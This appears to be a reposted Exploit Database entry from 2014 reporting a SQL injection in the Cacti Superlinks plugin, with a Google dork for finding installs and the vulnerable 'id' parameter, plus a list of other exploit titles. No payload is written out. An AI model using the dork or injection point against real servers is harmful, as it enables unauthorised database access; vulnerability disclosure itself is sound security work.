Cacti Superlinks Plugin 1.4-2 – SQL Injection

Exploit Database
11 阅读

作者： Napsterakos

日期： 2014-06-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33809/

 $$$$$$\$$\ $$\ $$$$$$\
$$__$$\ $$ |$$ | $$__$$\ 
$$ /\__|$$ |$$ | $$ /\__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ |$$__$$ |\____$$\ 
$$ |$$ |$$ |$$ | $$\ $$ |
\$$$$$$|$$\ $$ |$$ |$$\\$$$$$$|
 \______/ \__|\__|\__|\__|\______/ 
 
# Exploit Title: Cacti - Superlinks Plugin SQL Injection
# Google Dork: inurl:"/cacti/plugins/superlinks/"
# Date: 18/06/2014
# Exploit Author: Napsterakos
# Software Link: http://docs.cacti.net/plugin:superlinks


Link: http://localhost/cacti/plugins/superlinks/

Exploit: http://localhost/cacti/plugins/superlinks/superlinks.php?id=[SQLi]

Credits to: Greek Hacking Scene

last Exploits
Cacti Superlinks Plugin 1.4-2 – SQL Injection的更多信息

Family CMS 2.9 – Multiple Vulnerabilities：
WPN-XM Serverstack for Windows 0.8.6 – Multiple Vulnerabilities：
IPN Development Handler 2.0 – Multiple Vulnerabilities：
PHP-Nuke 5.0 – Viewslink SQL Injection：
Cacti v1.2.22 – Remote Command Execution (RCE)：
Internship Portal Management System 1.0 – Remote Code Execution(Unauthenticated)：
FOSCAM IP-Cameras – Improper Access Restrictions：
Joomla! Component Jphone 1.0 Alpha 3 – Local File Inclusion：